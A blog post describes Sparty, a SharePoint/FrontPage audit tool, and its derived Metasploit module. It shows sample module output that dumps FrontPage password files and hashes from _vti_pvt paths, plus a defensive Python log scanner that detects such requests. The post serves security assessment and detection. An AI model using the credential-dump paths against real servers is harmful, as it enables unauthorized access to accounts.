Sparty : Useful Tools Die Hard !

Sparty was designed to conduct efficient security assessments of MS SharePoint deployments. The tool has been used by the security community, which shows its acceptance and highlights that the tool is useful.

Sparty was presented at BlackHat 2013 and the presentation is available at:


Sparty is an open source tool written in Python to audit web applications using SharePoint and FrontPage architecture. The motivation behind this tool is to provide an easy and robust way to scrutinize the security configurations of SharePoint- and FrontPage-based web applications. Because this web administration software is complex, a simple and efficient tool is required that gathers information, checks access permissions, dumps critical information from default files and performs automated exploitation if security risks are identified. A number of automated scanners fall short of this, and Sparty is a solution to that.

The tool is hosted here:

Sparty has been enhanced by other researchers as well. Links are presented below. added support for “NTLM Authentication”, which was a good enhancement for testing authenticated MS SharePoint deployments.

More details here:

Further, the Sparty source code has also been used to draft an “Auxiliary Scanner” module for the Metasploit Framework for the vulnerability reported many years ago. Details are presented below:


Metasploit Framework Module —

The msf module works (referenced from: ) as shown below:

msf auxiliary(scanner/http/frontpage_credential_dump) > run

[*] Requesting: /about/_vti_pvt/service.pwd
[*] Found /about/_vti_pvt/service.pwd.
[*] Found FrontPage credentials.
[+] — service.pwd
[*] Requesting: /about/_vti_pvt/administrators.pwd
[*] Found /about/_vti_pvt/administrators.pwd.
[*] Found FrontPage credentials.
[+] — administrators.pwd
[*] Requesting: /about/_vti_pvt/authors.pwd
[*] Found /about/_vti_pvt/authors.pwd.
[*] Found FrontPage credentials.
[+] — authors.pwd

FrontPage

Source          Username  Password Hash
------          --------  -------------
Administrators            xMyvw4d3c1oWY
Authors                   xMyvw4d3c1oWY
Service                   jLAsITPJ8AsaR

[*] Credentials saved in: /root/.msf4/loot/20180921124828_default_10.10.10.10_frontpage.creds_090555.txt
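
For defenders, the requests in the output above are easy to spot in web server logs. The following is an added example, not part of Sparty or the Metasploit module: it scans access-log lines for requests to the three _vti_pvt password files and separates files that were actually served from mere probes. The log format (Common/Combined Log Format), the function name and the sample records are assumptions made for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# FrontPage password files requested in the scanner output above.
PWD_FILES = {"service.pwd", "administrators.pwd", "authors.pwd"}

# Assumed Common/Combined Log Format:
# client identity user [time] "METHOD path PROTO" status size
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

def find_pwd_requests(lines):
    """Map each client to the _vti_pvt/*.pwd paths it was served or only probed."""
    report = defaultdict(lambda: {"exposed": [], "probed": []})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log record
        # Normalise: drop the query string, percent-decode, ignore case.
        path = unquote(m["path"].split("?", 1)[0]).lower()
        parts = path.rstrip("/").split("/")
        if len(parts) < 2 or parts[-2] != "_vti_pvt" or parts[-1] not in PWD_FILES:
            continue
        # A 2xx status means the server returned the file: a real exposure.
        bucket = "exposed" if m["status"].startswith("2") else "probed"
        report[m["client"]][bucket].append(path)
    return dict(report)

# Constructed sample records (documentation address ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET /about/_vti_pvt/service.pwd HTTP/1.1" 200 64',
    '192.0.2.10 - - [01/Jan/2024:10:00:02 +0000] "GET /about/_vti_pvt/administrators.pwd HTTP/1.1" 200 64',
    '192.0.2.10 - - [01/Jan/2024:10:00:03 +0000] "GET /about/_VTI_PVT/authors.pwd HTTP/1.1" 404 0',
    '198.51.100.7 - - [01/Jan/2024:10:05:00 +0000] "GET /about/index.html HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:05:01 +0000] "GET /_vti_pvt/service%2Epwd?x=1 HTTP/1.1" 403 0',
]

if __name__ == "__main__":
    for client, hits in find_pwd_requests(SAMPLE_LOG).items():
        print(client, "exposed:", hits["exposed"], "probed:", hits["probed"])
```

Any entry under "exposed" means a password file was readable over HTTP and the accounts in it should be treated as compromised.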

Rapid 7 has added the auxiliary scanner for “frontpage_credential_dump”, as the database entry below shows:

Rapid 7: Auxiliary Scanner

Note: Thanks to all the researchers who further contributed to enhance the tool. Appreciate the fact that work has been credited as well.

Learn, Share and Enjoy !




Aditya K Sood
